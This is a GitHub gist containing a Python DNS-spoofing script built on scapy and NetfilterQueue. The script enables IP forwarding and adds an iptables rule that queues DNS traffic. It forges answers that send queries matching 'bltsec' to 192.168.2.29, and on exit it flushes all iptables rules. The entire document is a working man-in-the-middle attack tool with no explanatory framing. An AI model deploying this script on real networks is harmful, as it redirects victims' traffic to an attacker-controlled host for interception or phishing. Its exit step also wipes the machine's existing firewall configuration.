Created
December 9, 2017 23:52
-
-
Save BLTSEC/1d703d6106c3117f2594db62457a83e1 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from scapy.all import * | |
from netfilterqueue import NetfilterQueue | |
import os | |
def modify(packet): | |
domain = b'bltsec' | |
pkt = IP(packet.get_payload()) #converts the raw packet to a scapy compatible string | |
#modify the packet all you want here | |
if pkt.haslayer(DNSQR): | |
print((pkt[DNS].qd.qname).decode('utf-8')) | |
if domain in pkt[DNS].qd.qname: | |
print('It does have it***********************') | |
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\ | |
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\ | |
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\ | |
an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata='192.168.2.29')) | |
packet.set_payload(bytes(spoofed_pkt)) #set the packet content to our modified version | |
print('[+] Sent spoofed packet for %s' % domain) | |
packet.accept() #accept the packet | |
if __name__ == '__main__': | |
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file: | |
file.write(str(1)) | |
file.close() | |
os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1') | |
nfqueue = NetfilterQueue() | |
#1 is the iptabels rule queue number, modify is the callback function | |
nfqueue.bind(1, modify) | |
try: | |
print('[*] waiting for data...') | |
nfqueue.run() | |
except KeyboardInterrupt: | |
print('\nExiting...') | |
nfqueue.unbind() | |
with open('/proc/sys/net/ipv4/ip_forward', 'w') as file: | |
file.write(str(0)) | |
file.close() | |
os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment